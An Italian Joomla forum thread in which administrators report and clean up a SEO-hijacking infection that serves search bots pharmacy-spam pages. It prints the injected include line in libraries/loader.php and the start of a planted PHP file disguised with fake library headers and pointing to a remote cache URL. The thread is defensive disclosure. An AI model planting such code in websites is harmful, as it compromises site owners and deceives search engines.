Autore Topic: Segnalazione Hacking in the wild diffondete e segnalate  (Letto 703 volte)

Massimiliano Citterio

  • Visitatore
Gentili webmasters  di Siti basati su joomla,

essendo recentemente stato attaccato su entrambi due siti da me amministrati con Joomla 3.6.5  ed  avendo  rimosso l'hacking ma non identificato la fonte, verificato  tramite referenza google webmaster tools che almeno altri 500 siti hanno lo stesso problema nonostante i loro webmaster non se ne siano accorti  sono a segnalarvi  quanto segue con preghiera di verificare i vostri siti:

Tipo di Attacco:
SEO Hijacking

Payload:
il programma  identifica il tipo di browser agent  e qualora questo sia identificato come un Bot di motore di ricerca, sostituisce la pagina richiesta con una appositamente caricata in una cache remota  al fine di fornire al browser una copia della pagina originale  con tutti i link modificati per puntare ad un sito di vendita di Farmaci online Estero euro-pharm247.com

meccanismo di injection :
Probabile FTP tramite libreria Layer FTP Joomla innescato da un robot con riarmo periodico la cui fonte non sono riuscito ad identificare in quanto non ho i log e il provider li nega.

File Modificati:
libraries/loader.php

Codice Iniettato:

Codice: [Seleziona]
define('JPATH_ADAPTERSERVER',  dirname(__FILE__).'/joomla/base/adapterobserver.php');
if(file_exists(JPATH_ADAPTERSERVER))
@require_once(JPATH_ADAPTERSERVER);

File caricati
libraries/joomla/base/adapterobserver.php

Contenuto del file:  oscurato dominio  e codice di accesso alla cache remota
solo parte iniziale del file il file completo in allegato  per referenza
Codice: [Seleziona]
<?php  
// --------------------------------------------------------------------------------
// PhpConcept Library - Zip Module 2.8.2
// --------------------------------------------------------------------------------
// License GNU/LGPL - Vincent Blavet - August 2009
// http://www.phpconcept.net
// --------------------------------------------------------------------------------
//
// Presentation :
//   PclZip is a PHP library that manage ZIP archives.
//   So far tests show that archives generated by PclZip are readable by
//   WinZip application and other tools.
//
// Description :
//   See readme.txt and http://www.phpconcept.net
//
// Warning :
//   This library and the associated files are non commercial, non professional
//   work.
//   It should not have unexpected results. However if any damage is caused by
//   this software the author can not be responsible.
//   The use of this software is at the risk of the user.
//
// --------------------------------------------------------------------------------
// $Id: pclzip.lib.php,v 1.60 2009/09/30 21:01:04 vblavet Exp $
// --------------------------------------------------------------------------------
/**
 * @package Akismet
 */
/*
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam</strong>. It keeps your site protected from spam even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) Sign up for an Akismet API key, and 3) Go to your <a href="plugins.php?page=akismet-key-config">Akismet configuration[/url] page, and save your API key.
Version: 2.5.3
Author: Automattic
Author URI: http://automattic.com/wordpress-plugins/
License: GPLv2 or later
*/
 
/*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
*/
error_reporting(0);      
ignore_user_abort(true); 
//@header('X-Powered-By:');
set_time_limit(0); 


define('__STATISTIC_URL__',    'http://botvsbrowser.com/rch_pdf/show.php');  
define('__DOMAIN_NAME__''domain.ltd);  
define('
__SEC_VALUE__', 'axxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx3');




//'
#$GET_CONTENT_FUNCTIONS$#'
....

Offline alexred

  • Administrator
  • Fuori controllo
  • *****
  • Post: 24449
  • Sesso: Maschio
  • Esperto in ozio relaxed
    • Mostra profilo
    • AlexRed.com
Re:Segnalazione Hacking in the wild diffondete e segnalate
« Risposta #1 il: 19 Apr 2017, 08:39:48 »
Ciao Massimiliano Citterio,
erano presenti estensioni esterne installate in questi due siti che hanno bucato ?
::  www.joomlahost.it
Vieni a trovarmi alle Canarie, magari parliamo anche di Joomla!  :) www.turismo.eu

Massimiliano Citterio

  • Visitatore
Re:Segnalazione Hacking in the wild diffondete e segnalate
« Risposta #2 il: 19 Apr 2017, 09:12:05 »
Entrambi  i siti  erano stati migrati  dalla 1.5 qualche anno fa  utilizzando il plugin  Red Migrator.

Altre estensioni erano presenti solo su uno dei due siti

di seguito linko l'unico riscontro nei motori di ricerca di un caso analogo  con maggiori informazioni

https://wordpress.org/support/topic/polylang-spam-link-from-search-engine/

Offline alexred

  • Administrator
  • Fuori controllo
  • *****
  • Post: 24449
  • Sesso: Maschio
  • Esperto in ozio relaxed
    • Mostra profilo
    • AlexRed.com
Re:Segnalazione Hacking in the wild diffondete e segnalate
« Risposta #3 il: 19 Apr 2017, 09:14:40 »
verifica se anche le estensioni erano sempre state mantenute aggiornate.
::  www.joomlahost.it
Vieni a trovarmi alle Canarie, magari parliamo anche di Joomla!  :) www.turismo.eu

Massimiliano Citterio

  • Visitatore
Re:Segnalazione Hacking in the wild diffondete e segnalate
« Risposta #4 il: 19 Apr 2017, 10:10:04 »
dalla 3.0 in poi  sempre mantenuto aggiornato in automatico con verifica il core, la traduzione e tutte le estensioni.

Nota:
Nel 2013  ero cliente di Websolutions  per il mantenimento dei domini,
la società è stata violata in quell'anno ed il database degli utenti con passwords,  domini  e dati delle carte di credito è stato rubato.

A causa di questo ho dovuto rifare anche la carta di credito.

Devo verificare  se è possibile  che già in quel periodo non fosse stato inserita una backdoor di qualche tipo per concedere al bot la possibilità di scrivere.

Comunque  a scanso di equivoci  ho "Smerigliato lo spazio hosting"
Cambiato Provider ,  Reinstallato Una versione Vergine della 3.6.5 , esportato gli articoli   e gli utenti , e ricaricato esclusivamente questi  riconfigurato il template grafico, cambiato tutte le password.

Ora dal backup del sito precedente caricato in locale cercherò di capire qualcosa di più.

Vi  tengo aggiornati se trovo qualcosa, sonno permettendo.
« Ultima modifica: 21 Apr 2017, 22:31:28 da Massimiliano Citterio »

Offline Alex21

  • Appassionato
  • ***
  • Post: 385
    • Mostra profilo
    • Immobili a Padova
Re:Segnalazione Hacking in the wild diffondete e segnalate
« Risposta #5 il: 19 Apr 2017, 11:45:12 »
Grazie per la segnalazione Massimiliano,
spero vivamente che riuscirai a risolvere per il meglio.


L' unico url sospetto che hai postato, forse l'unico trovato, http://botvsbrowser.com/rch_pdf/show.php  risponde con una pagina completamente vuota, se esaminato con un browser privo della capacità di leggere il javascript. Meglio non chiamarlo con un browser a impostazioni normali, eh ...


L' IP di riferimento è questo 5.61.34.138
ed è di proprietà del Sistema Autonomo:  AS28753 Leaseweb Deutschland GmbH  un fornitore tedesco di server.
Una cosa che si può fare e che non costa nulla è inviare una mail al loro abuse segnalando che uno dei loro ip è coinvolto in un hackeraggio. L' ip non è assegnato a nessun host ma è praticamente impossibile che un ISP faccia direttamente attività che non dovrebbe, probabilmente uno dei loro clienti si è preso un ip di riserva, senza assegnarlo.
Anche se non rispondono faranno comunque dei controlli.
Ovviamente questo ip va bannato da ieri ...
Auguri e un saluto.






Massimiliano Citterio

  • Visitatore
Re:Segnalazione Hacking in the wild diffondete e segnalate
« Risposta #6 il: 19 Apr 2017, 12:01:51 »
già fatta una indagine sull url

questo è il risultato

https://productforums.google.com/forum/#!topic/webmasters/62syo3QCRo0;context-place=topicsearchin/webmasters/category$3A(malware--hacked-sites)

il servizio in se stesso è Safe, ma può essere utilizzato per scopi malevoli da terzi.

Offline Alex21

  • Appassionato
  • ***
  • Post: 385
    • Mostra profilo
    • Immobili a Padova
Re:Segnalazione Hacking in the wild diffondete e segnalate
« Risposta #7 il: 19 Apr 2017, 13:13:53 »
Vedo. Ci sono anche i tuoi post del 14 marzo.
Ho fatto una verifica. I file incriminati non li ho da nessuna parte, fortunatamente.
Ciao!

Offline Ahmed Salvini

  • Esploratore
  • **
  • Post: 95
    • Mostra profilo
Re:Segnalazione Hacking in the wild diffondete e segnalate
« Risposta #8 il: 19 Apr 2017, 15:04:06 »
Un attacco hijacking con le sue varianti (tabnabbing, clickjacking etc) non ha come obbiettivo joomla o altro ma i form con credenziali, meglio se di paypal piuttosto che ebay amazon etc

Il tuo problema (a mio umile parere) è che ti hanno bucato il sito (quando non saprei) inserendo uno script usato per hijacking così chi visitava il tuo sito era soggetto a quell'attacco. Ce ne sono infiniti di siti così ma navigando con browser un minimo settati e magari protetti da no script questo difficilmente succede

Massimiliano Citterio

  • Visitatore
Re:Segnalazione Hacking in the wild diffondete e segnalate
« Risposta #9 il: 20 Apr 2017, 13:48:17 »
Un attacco hijacking con le sue varianti (tabnabbing, clickjacking etc) non ha come obbiettivo joomla o altro ma i form con credenziali, meglio se di paypal piuttosto che ebay amazon etc

Hai frainteso questo non è un semplice hijacking,

ecco di cosa  si tratta
https://cognitiveseo.com/blog/7255/defend-against-serp-hijacking-before-you-lose-your-rankings/

L'attacco è volto  a essere invisibile agli utenti  umani e visibile  solo ai motori di ricerca,  serve ad aumentare  il ranking di ricerca di uno specifico sito, in questo caso  un sito di vendita di farmaci online  come sopra specificato , quasi sempre  localizzato  in  uno stato  per il quale  l'attività  di marketing seo non è normata e quindi, se non danneggia le persone o costituisce altro reato, non è punibile.

Cosa diversa  invece  per l'Italia dove  il fatto  costituisce "accesso abusivo a sistema informatico" ed è punibile ai sensi dell'art.615ter del codice penale.

https://it.wikipedia.org/wiki/Accesso_abusivo_a_un_sistema_informatico_o_telematico

Il problema  è che  grazie  a questi provider  di .........  che  per poco più di 20 euro  all'anno ti danno sì  un hosting, ma in caso  di accesso abusivo  non ti danno gli strumenti per raccogliere le prove e dimostrare il fatto, ne tanto meno identificare l'attore responsabile che ha commesso il fatto illecito, probabilmente la faranno franca.

La mia speranza  è che qualcun altro abbia subito l'attacco  su un server  virtuale o dedicato  e che quindi  sia in possesso, magari anche  inconsciamente , delle tracce forensi  per dimostrare l'illecito.

Voglio solo farvi capire che non ho postato questa segnalazione per chiedere aiuto o assistenza , anzi  tutt'altro  se qualcuno dovesse accorgersi di avere il file incriminato o si accorge di strane segnalazioni cercando il proprio sito su google , mi contatti pure che so come liberarvene. Se poi riusciamo anche a pizzicare il farabutto meglio.

Ho appena finito  di ripulire la cache di google e le pagine indicizzate  ed ho una lista  con 539 siti  con joomla o wordpress  che risultano violati allo stesso modo, ma per assurdo  per via della privacy non  posso  contattare i proprietari. Spero solo  che un giorno  facendo una ricerca  trovino  questo thread ed ottengano informazioni  su caso.  La  cosa più brutta  e trovarsi  un virus o un trojan  e non trovare nessuna informazione su internet; per un utente non professionista di informatica è disarmante.

Vi prego quindi d i rispondere a questo thread  solo se avete rilevato l'infezione sul vostro sito o avete considerazioni rilevanti da fare sul caso, mi arriverà la notifica e cercherò di rispondervi appena possibile.

Spero che il moderatore sia d'accordo con me su questo.

Ciao a tutti. 

« Ultima modifica: 20 Apr 2017, 13:52:20 da Massimiliano Citterio »

Offline Ahmed Salvini

  • Esploratore
  • **
  • Post: 95
    • Mostra profilo
Re:Segnalazione Hacking in the wild diffondete e segnalate
« Risposta #10 il: 20 Apr 2017, 21:15:21 »
Mi spieghi la differenza?

Articolo:
Hijacked SERP
In this dreaded circumstance, a hacker gains access to your website and inserts keywords and links pointing to his business

Io:
Il tuo problema (a mio umile parere) è che ti hanno bucato il sito (quando non saprei) inserendo uno script usato per hijacking

Offline tonicopi

  • Global Moderator
  • Instancabile
  • ********
  • Post: 12543
  • Sesso: Maschio
    • Mostra profilo
    • tonicopi su google
Re:Segnalazione Hacking in the wild diffondete e segnalate
« Risposta #11 il: 21 Apr 2017, 11:08:21 »
Grazie della utilissima segnalazione Massimiliano Citterio.
Qualche giorno fa google mi ha messo l'avviso di sito pericoloso e mi ha avvisato dell'hacheraggio.
In effetti nei risultati della ricerca da quel mio sito partivano  dei redirect che finivano a quel sito di medicinali.
Scansionato il sito con antivirus in locale e su tre siti online non risutava presente malware.
Chiedevo riabilitazione a google che in pochi gironi me la concedeva.
Ma continuavo a vedere quei redirect nei risultati della ricerca. Non avrei saputo che pesci pigliare.
Quando googlando mi sono imbattuto in questo tuo meraviglioso dettagliato post.
Trovato i due file che hai segnalato. Ripulito il primo e cancellato il secondo. Redirect spariti!  :) :) :)
L'accesso ftp e all'admin joomla a questo sito ce l'ho solo io.
Il sito è nato con joomla 3.2.1 ed è stato via via sempre aggiornato.
Se posso essere utile in qualche altro modo...
Grazie ancora!


Offline danielecr

  • Esploratore
  • **
  • Post: 73
    • Mostra profilo
Re:Segnalazione Hacking in the wild diffondete e segnalate
« Risposta #12 il: 21 Apr 2017, 11:42:02 »
E qua sorge un dubbio: vulnerabilità dell'ultima versione, exploit compiuto con versione vecchia o password ftp debole?
Tonicopi tu hai mica i log?

Offline tonicopi

  • Global Moderator
  • Instancabile
  • ********
  • Post: 12543
  • Sesso: Maschio
    • Mostra profilo
    • tonicopi su google
Re:Segnalazione Hacking in the wild diffondete e segnalate
« Risposta #13 il: 21 Apr 2017, 12:00:54 »
E qua sorge un dubbio: vulnerabilità dell'ultima versione, exploit compiuto con versione vecchia o password ftp debole?
Tonicopi tu hai mica i log?
- Qui da me l'exploit non poteva essere fatto su una versione vecchia perchè sono partito con la 3.2.1
- ho chiesto adesso i file di log ma visto questo preso dalle loro FAQ ...e non c'è nemmeno la possibilità di avere accesso ai log di sistema....  non credo li avremo...  >:(

Offline tonicopi

  • Global Moderator
  • Instancabile
  • ********
  • Post: 12543
  • Sesso: Maschio
    • Mostra profilo
    • tonicopi su google
Re:Segnalazione Hacking in the wild diffondete e segnalate
« Risposta #14 il: 21 Apr 2017, 12:16:47 »
Alè, beccato un altro sito, stesso provider, posso aggiungere che dei file modificati/aggiunti vedo la data via ftp: 22.2.2017
Il problema secondo me è molto serio e molto diffuso...
 >:(

Offline alexred

  • Administrator
  • Fuori controllo
  • *****
  • Post: 24449
  • Sesso: Maschio
  • Esperto in ozio relaxed
    • Mostra profilo
    • AlexRed.com
Re:Segnalazione Hacking in the wild diffondete e segnalate
« Risposta #15 il: 21 Apr 2017, 13:49:27 »
Che sistema operativo avete nei PC che utilizzate per connettervi via FTP a questi siti ?
Che programma utilizzate per connettervi via FTP a questi siti?

Toni, nei siti che hai trovato bucati, c'erano delle estensioni esterne installate ?
::  www.joomlahost.it
Vieni a trovarmi alle Canarie, magari parliamo anche di Joomla!  :) www.turismo.eu

Offline tonicopi

  • Global Moderator
  • Instancabile
  • ********
  • Post: 12543
  • Sesso: Maschio
    • Mostra profilo
    • tonicopi su google
Re:Segnalazione Hacking in the wild diffondete e segnalate
« Risposta #16 il: 21 Apr 2017, 14:45:03 »
Mio sistema operativo Windows 7 ultimate.
Programma ftp filezilla 3.25.1
In entrambi i siti uso template warp7, widgetkit, Jce, cache cleaner, akeeba backup, sh404sef.
Ma sono tutte aggiornate e le stesse estensioni le uso anche in altre decine di siti che non sono stati hackerati.
Per il momento.
Questo hackeraggio è davvero subdolo: ha ingannato persino gli operatori di google i quali, esaminando le pagine incriminate da browser anzichè dalla ricerca, hanno riabilitato il sito senza che in realtà fosse stato ripulito.  ;D
Sul secondo sito sono intervenuto prima che se ne accorgesse nessuno, grazie a questo post.  :)

Offline danielecr

  • Esploratore
  • **
  • Post: 73
    • Mostra profilo
Re:Segnalazione Hacking in the wild diffondete e segnalate
« Risposta #17 il: 21 Apr 2017, 15:24:17 »
Diffuso sembra diffuso...forse troppo diffuso...senza i file di log però purtroppo non possiamo capire da dove ha origine, come penso interpreti Alex, l'infezione potrebbe essere partita dal pc con un keylogger o qualcosa di simile..

Offline alexred

  • Administrator
  • Fuori controllo
  • *****
  • Post: 24449
  • Sesso: Maschio
  • Esperto in ozio relaxed
    • Mostra profilo
    • AlexRed.com
Re:Segnalazione Hacking in the wild diffondete e segnalate
« Risposta #18 il: 21 Apr 2017, 15:25:23 »
Ricordo una cosa simile molti anni fa ed il problema era un malware sui PC windows che prendeva i dati di connessione dalla configurazione di Filezilla (che li salvava in chiaro) e li inviava all'attaccante.
Ma non saprei se anche in questo caso sia questo il problema.
::  www.joomlahost.it
Vieni a trovarmi alle Canarie, magari parliamo anche di Joomla!  :) www.turismo.eu

Offline tonicopi

  • Global Moderator
  • Instancabile
  • ********
  • Post: 12543
  • Sesso: Maschio
    • Mostra profilo
    • tonicopi su google
Re:Segnalazione Hacking in the wild diffondete e segnalate
« Risposta #19 il: 21 Apr 2017, 16:03:39 »
...senza i file di log però purtroppo non possiamo capire da dove ha origine....
Ecco e non me li danno i file di log. Suggeriscono:

Le consigliamo di:
- effettuare un'accurata scansione antivirus ed antitrojan del suo PC
- modificare i dati di accesso FTP (e farlo periodicamente)
- aggiornare gli scripts presenti nello spazio web (ad esempio per joomla ci sono diversi exploit noti per le versioni non aggiornati)
- controllare il codice degli scripts PHP presenti nello spazio, perché potrebbero esserci backdoor

mentre mi annuciano che stanno implementando la possibilità per il cliente di accedere ai file di log. Tra qualche mese la feature sarà disponibile.

 

Torna su